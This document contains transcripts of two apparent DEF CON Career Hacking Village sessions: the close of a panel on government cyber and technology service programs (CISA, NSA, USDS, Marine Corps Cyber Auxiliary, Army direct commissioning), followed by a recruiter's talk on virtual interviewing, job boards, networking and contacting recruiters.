work. I also worked in a number of other federal agencies and they've all been equally rewarding and professionally satisfying that experience at the White House twice, the Pentagon, the Department of Justice. I've worked on Capitol Hill. I work for the judiciary branch and then in multiple elements in the Department of Defense. So fabulous, fabulous place to really spend your career or just spend a few years working on the federal service side. It's extremely rewarding. The National Security Agency has an incredible mission. As we know, it really is there to protect our nation. So we have both a cyber, we have a cybersecurity mission and we also have a signals intelligence mission. And so I think a little bit further, we're going to hear from Joe. He's going to ask us what jobs are available and we have phenomenal opportunities to learn and they really are very professionally rewarding and the people that you work with love what they do. You know, you want to work in an environment where people enjoy coming to work, enjoy working with you and enjoying people learning. So I have the tremendous opportunity to lead one of a premier learning institution for the National Security Cryptologic Enterprise, a global enterprise around the world with tens of thousands of students across multiple disciplines, including cryptology, cyber language and leadership and business. So I've enjoyed every step of the way along my federal career and just really appreciate the opportunity on the panel. Thanks so much, Diane. How about you, Chris? You want to unmute, Chris? Focus right thing. All right. Hey, I'm Chris. I'm an engineer from US Digital Service. 
We are a group of technologists. We work across the government on a tour of duty model. Tours run for, like, six months to four years, and we bring together engineers, designers, product managers, and trackers to improve government services for the American people. What's really great about US Digital Service is we have an opportunity to work all across government with lots of different agencies. So we have worked on a lot of great public facing services, making sure that we are trying to do the greatest good for the greatest number of people and the greatest need. Projects like va.gov, creating a new portal that is user focused for veterans to be able to get the services and benefits that they have earned through their service. Working with US Citizenship and Immigration Services to help people get green cards and their naturalization status faster. The Small Business Administration, helping people get investments and services and grow their communities. All sorts of things across the board. It's a really great group of opportunities. Thanks a lot Chris, and especially thank you, as a veteran. I really appreciate the work that the US Digital Service has done in that department. Now on to you, Roman. Sure. Thanks Joe, and thank you Chris for your help. As a recent veteran of the Marine Corps myself after serving about 30 years, I was about nine years enlisted and spent the remaining time as an officer working in cyber and communications. Since then I've now come in to join the Marine Corps Cyber Auxiliary. With the Cyber Auxiliary we facilitate public-private partnerships with the Marine Corps so that we can advance our national interests while keeping in mind the fact that people can provide national service in a context which is safe for all of us. Thanks Joe. Wonderful. How about you, Liz? Well, as you mentioned earlier, I recently retired from the Army, a 20 year Army officer, as a cyber warfare professional, and most recently was the Chief of the branch at the office of the Chief of Cyber at Fort Gordon, Georgia. The purpose of my being on the panel today is to talk about the program that I helped create in my last few years of service called the Army Cyber Specialty Direct Commissioning Program, and the genesis of this program was the recognition that there are concerned and talented civilians throughout our nation that want to serve in a capacity in which they can't in the private sector. For example, maybe they want to exercise and project power in and through the networks and through cyberspace, and as a civilian that can be something that maybe is not necessarily legal. So the cyber program here was created to find a way for them to come and do that on behalf of their nation, on behalf of their fellow citizens, and also to defend our networks. As you mentioned, Joe, most of the infrastructure belongs to the private sector, so I love, you know, the public-private partnerships, especially in some of the Title 32 National Guard organizations; they can do some of those things. So for people who've maybe made their fortune but want to come and serve, they can participate in this program. There are many requirements, for example there's a background check they need to pass to earn a top secret clearance, so that's something people need to keep in mind. But this is something that I'm very proud to have helped build, so I was able to leverage my connections inside the National Security Agency, people in the Pentagon, Army staff, and other services to help bring this program to fruition.
Thanks. Awesome thank you so much Liz. Now with the typical DEF CON attendee in mind somebody with serious technical skills but somebody who also may not have ever worked for or with the government can you please talk about some of the opportunities provided by those organizations or programs that you're here to discuss today and if you want to talk about some of the benefits of serving through those programs and some of the challenges feel free to discuss those too. We'll get started with you John the same order please. Okay I didn't want to step on anything there Joe. So you know you talk about technical capability and obviously with the focus on cyber that's something that's inherent in what we do in CISA. We have as I said earlier a lot of the work almost all the work we do frankly is voluntarily based and so understanding how different things work and being able to link those things together create partnerships to help critical infrastructure better defend themselves is essentially one of the core things that we do. So if you've got a lot of really high price talent like we do from anything from intelligence analysts to incident responders to threat hunters who go online both externally and internally in the typical red team types looking through vulnerability management processes and all the things you might expect from a technical perspective and by the way we're hiring and I'm going to say that probably six times today. There are also less technical roles that we have in CISA that revolve around things like governance, policy, practice, partnerships and things like that. So it's a combination of technical and non-technical with a technical sort of a slant to help us do the mission that we are charged with doing. And I think one of the things that's important to remember is with the stand up of the agency we've had an opportunity to sort of reset the culture and one of the big things that Director Krebs has been pushing has to do with personnel development. How do we develop our folks from start to finish? What opportunities do we provide them for training, for education, opportunities to actually practice their craft? We have folks that get to do really cool stuff every single day and that's one of the great things about it and if you want to encapsulate that I want to one word it's about mission. We have a great mission, we have some great people to work on that mission and our objective is to train you, to develop you and to help make you as professional and as solid as you can be to do what you're charged to do and then work you into our structure and get on with it. The biggest thing and this is a personal philosophy of mine is train them, watch over them so they become good, help them develop and then turn them loose and let them do their job. And I think that there's a lot of value in that and by doing that I think we create a cycle of development and one thing to point out too and I think Liz might have said this earlier relates to in government and out of government. I have no problem with people leaving CISA, I like to keep them but when they go out into the private sector or they go into a different federal agency or a state local agency for that matter we always tell them you're always welcome back because they bring another wealth of experience with them if we provide them the opportunities to do that and encourage them to grow and to build on their skills. 
So that's sort of how we look at it from my perspective, particularly if we're going to point right at some of the typical participants at DEF CON. Well, thank you, John. The National Security Agency partners really closely with DHS and CISA, so a lot of what John said definitely applies to my mission, so to speak. To answer Joe's question about what opportunities are available, I thought I might mention a little bit more about what NSA does and then give you a couple of examples of things that you can do. The nice thing about the National Security Agency and the Department of Defense is that they are truly committed to lifelong learning. As we know, the cyber arena is so incredibly complex and changes every single day; the threats are different, and the nation state adversaries keep using different techniques, so you have to stay very active in your learning. That's on-the-job learning, formal training and informal training, and just a lot of opportunities. The enterprise that I run is the learning enterprise for so many intelligent, brilliant people. We have PhDs who keep going; no matter where you are in terms of your academics, you keep going further. The National Security Agency is a unique asset for our country: we save lives, defend vital networks, and advance US goals and alliances. We are a member of the Department of Defense and the intelligence community, so it makes it pretty interesting because the mission is so incredibly rewarding. And to mention what John said about going in and out of the government sector and the private sector and coming back: we love that, and it's valued and celebrated, because the more talents and knowledge that you have, the more you're going to help us be better and help our country be better and really grow. The National Security Agency is a world leader in cryptology, the art and science of making and breaking codes, and it's an expertise that we get from people and technology; we really need that people component. So if you find the mission interesting, definitely consider it. What makes it a little bit different is that for us to do our jobs well and really help our nation be strong, we need to understand what our adversaries are doing and what their capabilities are, and we also have to be able to communicate and exchange some of our information with our own allies and our senior leaders. So we need to understand what's going on and then also provide for secure communications. It's pretty exciting, with SIGINT and cybersecurity. The opportunities at NSA are tremendous; we have developmental programs, and you'll even be paid to continue your education while you're going through it. We have tremendous opportunities across positions: there are computer network defense analysts, computer network operators, and capabilities development specialists, folks who understand and provide real-time sensitive mission support by maintaining situational awareness of potential cyber threats, and who leverage technical methods to manage, monitor, and execute large-scale operations. So if that sounds remotely interesting to you, and as I said, we just want the best talent, I recommend you go to intelligencecareers.gov, take a look, and it might just be the time for you to really jump in. And what you'll find is people have a
profound sense of contribution and service to the nation. We've had a number of incredibly brilliant people leave, do startups, and then actually want to come back to the agency, not for the money but because of the mission and how incredibly rewarding it is to really be putting Americans first. So thank you so much for giving me the opportunity to talk about what we do, because it's really, really great, and I hope you enjoyed it. Yeah, thank you. So USDS, I feel, is a pretty unique place. As an engineer at USDS we touch so many different projects; there are so many different opportunities that we have to serve and make an impact. So I would say to someone coming to USDS: you really have a wide range of opportunities to find ways to make a great impact on the public, and some of that is very technical work. We develop and ship applications, we get websites working when they crash, we do security audits, we do discovery sprints and dig through systems and give recommendations to help an agency make improvements and make good investments in technology. What they all have in common is a big, real-world impact on the public. Like the others have said, the mission is really something that is just hard to beat, and it's something that really resonates with me and with everyone that we work with; we're all here because we are aligned on that mission to help people. I come from the private sector, as a lot of folks in USDS do, and for a lot of folks this is our first job in the public sector. I've worked in different places and I've enjoyed my opportunities, but I was looking for something more; I was looking for a way that I could use my skills to do the most that they could, something that really was worth spending the time and the effort on, something to pour my heart into and have it really be meaningful. But I would also say that I'm an engineer, I love engineering, I love talking about tabs and spaces and crypto and what language is better and which editor to use, but it's not just about engineers. Technology is important, but it's also about solving the right problems and solving them in a way that actually works for people. So we're also looking for great designers and great product managers, people who understand that technology is not just a tool; a website isn't just a tool, it's a service that needs to be designed with the user in mind and designed in a way that works for them, and isn't just made to check off some requirements or some boxes. It's got to be thought through from start to finish as an experience for the user that really works for them. Thanks, Chris. You know, the Marine Corps Cyber Auxiliary is a unique organization; like some of us here, it's a volunteer organization, and what we're trying to do is enhance the Marine Corps' ability to operate in cyberspace. We recently came across the situation where we didn't have formally trained and designated Marines in cyberspace, and it's only been within the last couple of years that we've had an occupational field for cyberspace operations. We've now had the first Marines cross the yellow footprints at boot camp, graduate, and enter the field to become cyberspace operators in the Marine Corps. We've had people in the Marine Corps operating in cyber for 30
years, of course, but we've always been organized somewhat differently. Now we've come together formally under the 1700 MOS field and we are working together to move forward. What the Cyber Auxiliary does is take volunteers from the private sector, and it allows people who currently might serve in billets in civil service, or are augmented through contractors, or perhaps previously served and have been honorably discharged, to participate. It permits those people, US citizens who have a minimum of three years of experience in the cyber industry, who are highly regarded in their field and are enthusiastic volunteers, and it brings them forward to help shape, train, educate, advise and mentor the young Marines moving forward in cyber. We'll talk a little bit more about some of those opportunities that have come across and where people have made a huge impact. Suffice it to say that the Cyber Aux is part of that larger Marine Corps effort to posture our forces to operate in the information environment more effectively, and we're managed by highly qualified talent in uniform. And to wrap it all up, frankly, as Liz can point out, if you are interested in wearing a uniform and popping back in, you've got an opportunity through her program. However, if you do not need to wear a uniform, and if you are not particularly interested in meeting those physical fitness standards of a Marine or of the military, you'll still be welcome to join us here at the Marine Corps Cyber Auxiliary. Go ahead, Liz. Thanks, Roman. So for people who wish to wear a uniform, the Cyber Specialty Direct Commissioning Program might be for you. If it's something you've considered, at least consider applying; you never know when your particular skills may be in high demand to help your nation accomplish its goals. And if you also have a leadership streak, if you say, I want to be a leader, I want to help coach, train and mentor others and put my skills to work, consider it. Some of the skills that were in demand just before I retired are software engineering, data science, machine learning expertise, OPSEC engineering, ICS expertise (I know John knows that's in high demand), and AI expertise as well. For example, there's a whole center the DoD has built for artificial intelligence, and last I checked the Army was working with them to build some requirements for uniformed Army cyber warfare officers to come and work in those roles at the Joint Artificial Intelligence Center.
A high-impact example from one of our great commissionees: we had a civilian who felt like he had made his fortune, was a prior-service individual, applied for the program, and was accepted as one of the first two people commissioned in the program. He helped build the virtual persistent training environment for all of the Army's cyberspace operators to use. This was a program that had been in development for many years, but he was really able to kick it into high gear, apply his software engineering expertise, and get it built, and now it's fully operationally capable for people to use. I think people at the agency, Diane, may also use this persistent training environment that was built. So you never know when you'll be able to have an impact until you try, and I highly encourage everyone to consider serving in a uniform. You can find more information about the current requirements at goarmy.com/cyber; there's a link there for the direct commissioning program, the current requirements should be listed there for you to review, and there are also instructions on how to apply. As for the benefits of serving in a uniform, there are many. For uniformed service, the minimum number of years to achieve some of these benefits is three years and, I think, 90 days, so you don't need to sign up for any longer than your first tour to achieve some of them. If you're interested in, say, the post-9/11 GI Bill for your own professional education or a master's degree, this can be transferred to your children or even to your spouse, so that provides money for graduate and undergraduate degree programs for them. There's also access to the VA home loan program, so you'll be able to afford a home with zero down payment; that's something that uniformed members of all services have access to, and that might be attractive to somebody who's interested in buying a home. You should also know that for Army cyber warfare officers, most of our assignments are at Fort Gordon, Georgia and Fort Meade, Maryland, so if you like Fort Meade and Fort Gordon, cyber warfare might be the branch for you. We don't have many positions in places like, say, Fort Hood, Texas, and you don't have to be worried about going to Antarctica or Alaska or other far-flung locations. Army Cyber headquarters is moving to Fort Gordon, I anticipate in the next year, and Cyber Command headquarters is at Fort Meade, Maryland; that's another place where we have a lot of assignments. Those are the primary and developing locations where you can see future service. Some other benefits are listed at militaryonesource.mil; rather than listing all of them, I encourage you to go visit militaryonesource.mil or goarmy.com/cyber to get that information. One other place you can get information, if you have your pencil handy: on your phone, text the word cyberspace, one word, to 22828, and that will put you in contact with a recruiter at the Office of the Chief of Cyber, and they'll get in contact with you about opportunities to serve. Cool, that was a really great rundown, everybody, thank you so much. With us unfortunately running out of time for this panel, I just wanted to go down the list one more time to see if you had any closing thoughts and any tangible advice that you'd like
to share with the audience. Well, sure. Obviously, coming into government service has its challenges. There is a challenge, obviously, between pay in the federal government, in other government, and in the private sector; there's the challenge of navigating the hiring process, which can be very difficult in government; and there's the challenge of getting the security clearance if you haven't gotten one already. If you're considering coming to work with us at CISA, you can help us push the envelope on all those challenges, with the idea in mind that this is about the mission, and if you come in with a mission focus you're going to have some great success. The corollary to that, in my mind, is that we are trying to take what was a headquarters component element, now an operational agency, and make a huge cultural change, and some of the things that we're pushing are innovation, speed, and partnerships, keeping it all within that mission focus. So if you have the desire, we're looking, we're hiring; we've got plenty of positions, both in the DC area and around the nation, where we're looking for quality cyber talent and people who have a mission focus. So I'll leave it at that, Joe, and give it over to the next in line. Thanks, John. Diane? Great, thank you, John. I just wanted to say, consider this opportunity for federal service if you have even the remotest interest in working with people who are innovative and passionate, who love what they do, who are continual learners with a commitment to partnering and collaborating; it's a great environment. I also want to mention, our field is a little more male dominated, as you know, but there are professional communities like Women in Cybersecurity that give you a sense of community outside the workplace to really help give you the skills that you might need inside the workplace to navigate that. So we'd love to see you, and thank you so much. Yeah, I would just say, I never really thought that I would necessarily end up being a federal employee; you never really know what's going to happen. But we as technologists have a really incredible amount of power with the skills that we have, and government is a really great place to make a huge impact with that power. At USDS we have a unique model where you do a term of service, so it doesn't have to be a lifelong commitment; terms can be as short as three to six months and up to four years. So if you want to do that and then go back to the private sector, we are very happy to have you and have your impact. USDS.gov is our website, and if you want to see more information about some of the work we do, at the bottom of the page we have our impact report that we just posted, talking about some of the big projects that we've done in the last year, including some of the things that I've been lucky enough to work on. But yeah, we really are trying to build bridges and break down those walls between the private and public sectors and bring the best of private sector technology into government and improve everything for the American people.
Thanks, Chris. We've all heard the advice that you should bloom where you're planted, and there have been many, many opportunities discussed here to do that. If you'd like to be a Marine, there is a path in cyber if you want to wear a uniform. If you find that you have other skills, and perhaps you've held a career elsewhere in life, you can still affect Marines who serve by shaping capture-the-flag exercises and developing other tools that might help Marines in uniform. You can also assist with our summer programs, helping with the Young Marines and helping those who provide STEM education for young people in our country, who are then shaped to serve themselves better through a cyber career path as they move forward. One thing that I'd like to leave you with is that you can follow us on LinkedIn, and you can help to serve wherever you are in the nation today, without having to wear a uniform, but with your heart in the right place. And that brings us to Liz. Thanks, Roman. So some things to keep in mind with uniformed service that may not be as comfortable are the physical training requirements. If you're not familiar with some of the physical requirements for the different services, in particular my experience with the Army, you can find that on goarmy.com. The physical fitness test: you'll need to take it, and you'll need to be able to meet those standards to pass your basic course, so that's really very important to understand. Also keep in mind that you're a technologist, as Chris was describing, with a technologist focus, but you're also a leader, an individual leading soldiers in the Army; the Air Force, I understand, has a similar program as well. Great, well, thank you very much, Liz, and everybody on the panel, and Kathleen, and also Travis and the other folks behind the scenes. The only things that I'm going to leave you with are a reminder about USAjobs.gov, which is a huge database of opportunities for employment across the US government, and also, because I didn't mention it earlier, a disclaimer: everybody's opinions expressed in this panel were their own and not necessarily those of any government entity. And with that, I'm going to hand it back over to Kathleen. Thank you so much, everybody. Great panel, everyone, thank you so much. I know that you opened everyone's eyes to new opportunities for their careers. I want the audience to know that among the career coaches, at least 40 percent have had some kind of government service or military service, so they are able to provide you their perspectives and their tips on how to fulfill your career within national service. We also have resume reviewers and recruiters who are familiar with recruiting for federal agencies and for government contractors. Thank you so much, everyone, and thank you to all of our panelists. We'll see you for the next session.
|
The National Service Panel highlights the opportunities and challenges with national service, focusing on tech-related programs across the federal government. The panel is organized by the Military Cyber Professionals Association (MCPA) and includes reps discussing the US Digital Service, US Marine Corps Cyber Auxiliary, National Security Agency (NSA), US Army Cyber Direct Commissioning Program, and Cybersecurity and Infrastructure Security Agency (CISA).
|
10.5446/51580 (DOI)
|
Welcome to Career Hacking Village. My name is Kathleen Smith. I'm one of the Village team members. We're so happy that we finally have been able to bring a Career Hacking Village to DEF CON. As we know, many of us are looking for a job, and by recent studies, over 43 percent of people said they did not know how to find a job. So I'm very thankful to invite Kirsten Renner, one of the best recruiters in our community, to share some of the best practices, especially now. Please remember that we'll be doing discussion in Discord. We also have resume review and career coaching going on from 10 to 1700 on Friday and 12 to 1600 on Saturday. So without further ado, Kirsten. Hello, DEF CON. I know that we would normally all be in Vegas right now, but let's make the best of this. This is actually the first summer in 11 years that I am not there doing summer camp. I know that for a lot of you, it's 20 or more years. So this is crazy, but let's get through it and make the best of it. So this is my talk, "But I Still Need a Job." This will be a conversation for the active candidates and also, mostly probably, for the passive candidates as well. I'm also going to offer the perspective of how this can be helpful not just for candidates, but if you are trying to fill a job, or if you will have one to fill in the future, this is going to be relevant to you too. And here's why: think about what this is going to offer you. Think about what challenges candidates are facing so that you can help make things better for them. So we will go through, initially, what's new in our current times. Although I will say we're so far into this that we're probably all getting to the point of being experts at all the new things we have to deal with, I will touch upon them quickly. I will go through some tips. One thing that I want to do differently is show you how to hopefully take advantage of the new circumstances and how they can actually have a positive twist for you as well. And then we will go through what I like to call the fundamentals, the things that all candidates face and talk about on a regular basis. So who am I? As Kathleen mentioned, I am Kirsten Renner. I am the director of recruiting at Novetta, an advanced analytics and cybersecurity firm. I'm a college dropout; I started in software engineering, and then I went into IT and had that lead to recruiting. When I was building help desks and working in management, my favorite part was building the teams, finding the people to bring onto the teams. And so here I am 20 years later. Random personal thing: I run ultras. I've also run marathons; I've done about a dozen of them in the last 10 years. And I have an almost disturbing love for my grandkids. Also a proud Army mom, as of the last week. So I'm going to talk to you from a few different perspectives. I have seen and heard and read many intelligent individuals offering useful advice from their perspectives on how to best find a job in our community specifically. And they're coming from the perspective of having been a candidate or a hiring manager or, in some cases, a recruiter. I just happen to have been all of those things, and I still am a couple of those things. So I'm hoping that I can take my 20-ish years of doing this and offer to you the things that I have seen definitely work and definitely not work, and make those into tools that are going to work for you.
So speaking of perspectives, the survey that you see on the screen is something that I put up on Twitter and LinkedIn. And anytime you see a survey in my slides, that's where I got from. Otherwise I would have stated the source. So I feel like it was a few months ago I heard, and this is not an exact quote, but Alyssa Miller was talking about a survey that she had put out for a talk that she was doing. I believe it was RSA, which she noted. And she said something along the lines of that there's a certain amount of responses that constitutes data maybe that makes it scientific. So this is not that, this is not thousands or times of thousands of responses. This is probably hundreds of responses. This is just little snapshots. This is before I started to do or to put together the talks and missions that I was going to do for this year. I wanted my community, the people that I speak to, the people that I interact with in the community to tell me what they face the most. What are they looking at the most? What do they want me to focus on and talk about? So that was the purpose of these. So again, I was actually a little bit surprised when I was looking at this. Are you actively looking? Are you passively looking? Where are you coming from from a candidate's perspective? And I did get Dorkbader's permission to quote him. Apparently when he responded to the survey, he responded with a comment that it was, it is really good and I couldn't come up with a better way to say it. So I asked him if I could quote him to guess. It is really good career hygiene to always be at least kind of keeping your ears and eyes open. That's how we do this. And as a random side note, technically, I met the CEO of my current company when I was happily employed and had no interest in looking for another job ever again. I was going to retire from the job where I was. So I think that's just a really good testimony to why you should always keep your eyes open. And we met at the Mandalay pool. So yeah, that's fun. Okay. So things are kind of different now, aren't they? Interviews are happening differently. Everything's happening differently. So we're going to go pretty quickly through some of the tips and reminders and I'll, I am Italian so I will tell a funny story or I find it funny. I'll probably laugh at myself as well. But before we go to the tips, I want you to know that one of the things that I am very passionate about when it comes to recruiting and my everyone that works for me, all the recruiters that work for me will tell you this is how business is done. You have to treat your candidates like they are the most important thing. The candidate experience is the basis upon which all the processes that I design and implement and analyze are based on the ideal candidate experience. So when I did an iteration of this presentation at B-side San Antonio a few weeks ago, people on Discord were commenting while I was giving the presentation as opposed to reporting it the way I am now and they were shocked. They were shocked when I said that the recruiters should always make you feel like they are your advocate and they care about you and this is about you, the candidate. It shouldn't be shocking to you. It is, it upsets me that it is shocking and we can make this better. Okay, so we together will make this better. 
Keep in mind that throughout your experience as a candidate, one thing that is really an advantage to you is that your future employer, which is everyone that you are interviewing with and everybody that you are talking to, is going to reveal to you in all likelihood what it will be like to work for them. I believe, right, and on the other hand, as a recruiter, the way that you are behaving as a candidate is going to give me a little view into what it is like to work with you, right? So let's do, let's be kind both ways. Let's be reasonable both ways. Again, keep in mind, if they aren't flexible, if they aren't accommodating, if they won't give you a break and let you be a human and meet you halfway, what's it going to be like to work there? So keep that in mind while you're facing challenges in our current environment. So let's just go through a couple of the pointers. I sense this is recorded. You can take a screenshot of this. You can save it. I won't read it all verbatim. However, test, test, test. I logged in eight minutes early for this recording and guess what? I had to fix some things. Some things weren't working. So test your stuff, right? Test your camera, test your microphone, test everything. I will also tell, here's a funny story. When I was presenting at the Many Hats Club isolation con earlier this year, my first ever virtual presentation, by the way, I logged in to Green Room and Ray Redacted was there and he said, let's test it out. Let's see. So many of us will have many iterations of our browsers open at one time with 10 or 15 tabs per browser at one time. Let me tell you something. Close all that stuff. Close all the things. So many things can happen. My company is a Google shop. So if I had any of those Google windows open right now, while I'm trying to do this via Zoom, the camera is going to get confused and it's going to say, who's trying to use me and it's never going to work, right? You may not even realize that some minimized window is stealing your camera. So very important. Back to the Ray story. Don't just close the windows. Close the document. When I shared my screen with him as a test, guess what? The first thing that popped up on his screen, I couldn't see it. So a lot of us will have many monitors open at once as well. You don't know what you have minimized. You don't even remember. It was my credit report. I gave my Social Security number, date of birth, credit report and credit explanation to a hacker just like that. So close all the things. So when I say close all the things, by the way, I get the song, hack all the things stuck in my head and then I say close all the things. But I won't say anything to you today. I'll go through a few more things. Look out for distractions. My dog right now is about a foot away from me. He's always about a foot away from me. If anything happens, he will start barking. Okay? Notice there's a glare on my glasses right now. So do as I say and not as I do. My dog's in the room. My glasses have a glare on them. But notice things like that. Notice what's going on in the background. If I were to take my screen down, you would see my bulletin board and it has a lot of interesting things on it and that would distract you. So if you're going for your virtual interview, just be reasonable and be aware of what could be distracting. I turned off all my phones, which by the way, is hard for me because my son is at basic training and I'm trying to have my phone ready for any calls. But turn off all your phones. 
Turn off all the things. So be aware of noises that you make. Don't sip on your coffee. Just wait until it's over. That can sound really gross, especially if whoever's interviewing you has headphones on. If I start shifting the papers around on my desk, doesn't that sound shitty? Don't do that. Don't shift things around. Don't hold your pen in your hand like I am right now. Don't do what I'm doing. All right, another thing you can do, and actually I'll give ready credit for this one too. I won't tell you what he calls it, but look into the camera. So I personally am distracted right now because I can see myself. I can see the slide. I can see my notes. But try to look into the camera to make this more engaging. It stinks that I can't see all of you. I love you. I wish I could see your faces, but look into the camera. It makes you more engaging. Okay, so one size does not fit all. What do I mean by that? In my upcoming slides, when I go through the fundamentals, I'm going to be mentioning to you what I think are going to be useful ways for you to be your own best advocate and be successful as a candidate. Are all the things going to fit all the people all the time? Surely not. Right? Because we already covered that many of you are in different stages. So frankly, if you're in the, I don't have a job. I'm trying to keep the lights on. I'm trying to get a paycheck. You're going to have different standards and perspectives that are going to make you make different decisions during your candidacy journey. And all of us, the best of us, a lot of us have found ourselves at times unemployed not by choice, right? It's happened to me. And guess what? I had to take the first thing that came along. So I could pay my bills at that time. So that's another stage that you could be in throughout your career. So just keep in mind that I'm offering to you different tools that will make sense at different times. So my recruiting team, where I currently work, is not part of HR. And I'll tell you why. We're part of operations. And this is something that I always hoped I would be able to do. And I'm thankful that I can now be part of operations so that we're not working against our customers, right? Because if the talent that works at the company is just as much of a tool commodity, if you will, as the hardware, as the software, then in fact, recruiting is part of the operations of that company, right? To provide the services, to provide the software or the products or whatever it is, you need the right tools. People are tools in this instance, in this metaphor. So when I look back at my very brief time of being a software engineer, back in the back in the early 90s, using Visual Basic, as a software engineer, when you're trying to solve a problem, what did I do to solve the problem? You do intakes. You do intakes for the purpose of what? Defining requirements with all of your stakeholders with your customers and so forth. Then you do what? You plot and you plan and you write boards and you try to come up with a strategy and implement and you test and you analyze, rinse, repeat. That's also recruiting when done properly. This is listening. I'm going to do what as a recruiter? I'm going to talk to the candidates, make it about them, figure out what their requirements are, preferences, requirements, and rank those requirements, right? I'm going to find out what's most important. I'm going to do a proper write up and deliver that to the customer in this case being the hiring manager. 
Also, a stakeholder is your customer too, and that would be the hiring manager. So think of the recruiter as an engineer in this case, or as a hacker if you will, because of what they're going to then try to do. And I don't mean hacker in the sense people think of: social engineering and manipulating and being tricky and crazy. I'm not thinking about that. What I'm thinking about is understanding the machine of the human, getting to know them, finding the requirements from each individual. Every single one of them is different. The hiring managers are different, the candidates are all different, and then you find the right match. So it's not so much hacking or manipulating, that sort of thing; it's not social engineering. It's really engineering. It's really designing and finding the solution that will bridge the gaps between those two parties and get them all the way to the finish line. So let's talk about item number one, one of the areas people want help with. They want help. I asked, what do you need the most help with? Is it searching? Is it finding? Is it resume writing, which I thought, and used to always hear, was the big problem? But they said networking. I posted my very first job opening by printing it and faxing it to a newspaper, a paper newspaper. This is when the internet was but a thought. And we've come a long way since then. Let's talk about what we can do in the networking area. We all know about job boards. I'm not going to list everything on here. I am not here, by the way, to promote or endorse anything that I have listed here that is a product. I put that out there, but I will talk about how some of them are useful. All right. Everybody knows about job boards, but you may or may not know about state employment sites. And here's the reason I'm going to mention that to you. Every single state has one, promise. Now, because they're local government or municipality-run websites, they might suck. They might not be user friendly. They might not be easy to get your way around on. However, they are there, and they are supposed to list every opening. And here's how that works. All the companies that are hiring probably have an applicant tracking system, and they have scraping tools running in the background that are delivering those job openings to all the state employment boards. The reason that this can be useful to you: when I did this talk in Tampa in person, I said, let's do an experiment. Everybody whip out your phone. So do this later if you want. On your phone, go find either your state employment job board or the one for the state that you're targeting, that you want to move to, or that you're interested in, and search around and see what's posted. And you know what? You're going to find out that there are jobs you had no idea that company was hiring for in your state. In fact, in our current environment, you are more likely to see jobs that you never knew were available where you are, because they're available virtually now. So enough about that. No, I'm not getting paid by the state government. I just wanted you to know, because people may not realize that that's even possible. So please, here's another thing. Actually, somebody spoke up in my last talk and told me I was incorrect, but in this case, I'm not. Don't pay. Don't pay anyone for anything.
Sorry, people do get paid to do this stuff, but there are way too many people willing to help you for free. Way, way, way too many people willing to help you for free with your resume, with your interview skills, happening right now, here today at DEF CON. It happens at all the BSides. Thanks, Kathleen. There are people who will help you learn how to interview better. There are people who will help you write your resume better. Okay. In particular, one of the things listed on this slide says, hey, user, do you want to be a premium user? Pay me lots of money, and then the recruiters will be able to find you better. Actually, there are four or five sites listed on this slide whose owners are probably mad at me, because they want you to pay as a user. Don't do it, and I'll tell you why. Because the recruiters, because the companies who are hiring, are already paying the money, lots and lots and lots of money, to find you regardless of your account, regardless of whether you have one, and certainly you don't need a premium one. Promise. I just don't want you to waste your money. But you can if you want to. So, I haven't recruited hands-on in a while, excuse me, but I know that pretty much all recruiters have a LinkedIn account, and we will get to how to communicate with them through that, and most of them have all of the ways that you can connect to them open as well. I know it's hard right now, but conferences are amazing. I can't say enough about them. I can't tell you how valuable they have been to me over well over a decade. The greater part of my success, and I'm a pretty successful recruiter, is through the conferences, through the community, and through networking; not just the hiring happy hours and all that junk, but the industry conferences in particular are the most valuable. And if you ever have the opportunity to volunteer at one of them, I promise it's going to be immensely beneficial to you. It will be so advantageous to you to be a volunteer. You will learn and you will grow, and your network will flourish when you volunteer in any way that you can. So raise your hand, volunteer. Okay, so real quick about this: you may or may not be able to see these images. I threw them together very, very quickly. I hear you when you say the recruiters are horrible. They're horrible. They reach out to me and they say horrible things to me, and they say things that make no sense, and why are they asking me all these questions? I get it. I'm going to talk to you about two different perspectives here real quick. The top is a quick snapshot of my LinkedIn. My LinkedIn says, oh, by the way, if you're a recruiter and I don't know you, I won't accept your connection request. PS, I'm not looking for a job. It says it right there. However, you can also see this dude reaches out and says, do you want to recruit for me? So I get it, buddy. You're doing the same; my recruiters do their thing as well. However, I also hear a lot of you saying, or I see a lot of you saying, are you serious? You just asked me if I wanted to be a Java developer and I'm a CTO. This is kind of like that, right? No, I don't want to stop being a director and go source for you. I get it. It happened. I'm sorry. But it's also an opportunity, and this could be an opportunity, if I had time, for me to talk to this person and to say, you know what, you'll notice that no, I'm not looking; however, I do know somebody who is, or maybe you should look in this direction or that direction.
So everything's always an opportunity to network and to help others as well. Also real quick snapshot down here is 15 or so people who are all they said to me in my DMs is, hey, and that's all they said. Sorry, not answering you. So I'm not saying you have to tell me something super clever or write a full dissertation or anything crazy like that, but you have to compel the people you're reaching out to to take the extra step. I heard I read, yeah, three to five seconds. All right. So I'm just going to do slightly better than just, hey, because frankly, people like recruiters who open up their DMs to you on social media are kind of making themselves vulnerable when they do that. They're doing it for you so that they can help you. But we're also opening it up to creepy things that people send us every once in a while. So be kind. Okay. So let's talk about resume real quick. Obviously be truthful on your resume. I will go through the guidelines that I think make your resume most effective for you. However, remember what I said about responses and communicating on DMs. So let me tell you what to do real quick. And I really want to hear your responses someday. However, you get around to it, letting me know if this worked for you. People don't get back to you. I could be one of those people. I'm guilty of it. It happened. I'm sorry. Remember that you're not the only person that they're hearing from. Okay. So how can you get them to respond to you? Because I'm betting that most of them, them being the recruiters, want to talk to you. They want to help you, right? But they have a great volume of people that they're trying to help. So please remember that you're not alone. There's a lot of people in the inbox. How can you get them to respond to your application when you apply? Apply? Wait. Wait a couple of days. Not longer than that. Then go to LinkedIn. Look for ABC company wherever you apply. Probably a recruiter works there. Certainly click the people button. You look for who has the recruiter title. You send them a DM. Hi, Jim. It's me, Mary. I apply for ABC. Look for an identifier when you apply for the job that can help them look and find the job. There's usually a rec ID or something like that. Look for that. Mention it. So then they're going to go look for your application. And when you reach out, you say, I applied for this. Can't wait to hear back from you. Okay. Probably they're going to reply in one business day. They're going to see your message. They're going to reply. They may have never seen your application. Sorry, it happened. They probably have 50 jobs to fill. They probably have 50 applications per week or more per job. So now what are you going to do? If you don't hear back from that recruiter, first of all, if it was one of my recruiters, tell me. If it was any recruiter and they don't get back to you in a day, if you want, the next step could be look for a director of whatever the engineering department is. If you have a director of that department as well, you say, Hey, hi, Jane. I applied for this position. I reached out to so and so can't wait to hear back. Let me know if you need anything else from me. Now really probably I just kind of got to the career and trouble, but you're probably going to do that. Okay. So let's go really quickly 